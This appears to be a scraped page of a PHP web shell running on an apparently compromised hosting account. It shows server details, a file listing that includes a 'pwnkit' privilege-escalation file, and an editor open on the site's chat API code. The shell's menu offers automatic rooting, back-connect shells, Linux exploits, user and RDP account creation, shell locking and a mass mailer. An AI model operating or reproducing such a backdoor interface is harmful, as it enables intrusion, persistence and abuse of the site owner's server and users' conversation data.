Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
chatblueversion /
api /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
chat.php
3.37
KB
-rw----r--
conversation.php
814
B
-rw----r--
pwnkit
0
B
-rwxr-xr-x
worksec.php
1.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : conversation.php
<?php require dirname(__DIR__).'/includes/bootstrap.php'; $id=$_GET['id']??'';$u=current_user();$owner='';$ownerId=''; if($u){$owner='user_id';$ownerId=$u['id'];}else{$token=$_COOKIE['bvx_guest']??'';if(!$token)json_out(['error'=>'Not found'],404);$s=$pdo->prepare('SELECT id FROM guest_sessions WHERE token_hash=? AND updated_at>=NOW()-INTERVAL 24 HOUR');$s->execute([hash('sha256',$token)]);$g=$s->fetch();if(!$g)json_out(['error'=>'Not found'],404);$owner='guest_id';$ownerId=$g['id'];} $q=$pdo->prepare("SELECT id FROM conversations WHERE id=? AND $owner=?");$q->execute([$id,$ownerId]);if(!$q->fetch())json_out(['error'=>'Not found'],404);$m=$pdo->prepare('SELECT role,content,created_at FROM messages WHERE conversation_id=? ORDER BY id');$m->execute([$id]);json_out(['id'=>$id,'messages'=>$m->fetchAll()]);
Close